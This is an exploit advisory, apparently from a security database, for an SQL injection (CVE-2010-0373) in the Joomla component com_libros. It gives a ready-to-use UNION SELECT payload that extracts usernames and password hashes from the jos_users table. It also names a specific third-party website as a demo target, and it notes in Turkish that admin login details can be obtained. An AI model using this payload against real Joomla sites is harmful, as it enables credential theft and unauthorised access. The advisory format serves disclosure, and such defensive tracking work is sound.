Topic : | Joomla Component com_libros SQL Injection Vulnerability
|
SecurityAlert : 6967
CVE : CVE-2010-0373
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : FL0RiX
Published : 24.01.2010
Affected Software : | joomla:com_libros |
 Advisory Content : ###########
# Joomla Component com_libros SQL Injection Vulnerability
###########
# Author :FL0RiX
#
# Name : com_libros
#
# Bug Type : SQL Injection
#
# Infection : Admin login bilgileri alinabilir.
#
# Demo Vuln :
#
#
http://www.areamide.com/index.php?option=com_libros&task=detail&Itemid=27&i
d=[EXPLOIT]
#Exploit:null+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,1
0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3
5,36,37,38,39,40,41,42,43,44,45,46,47,48,49+from+jos_users--
#############################################################
References :
http://xforce.iss.net/xforce/xfdb/55696
http://www.exploit-db.com/exploits/11178
http://packetstormsecurity.org/1001-exploits/joomlalibros-sql.txt
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|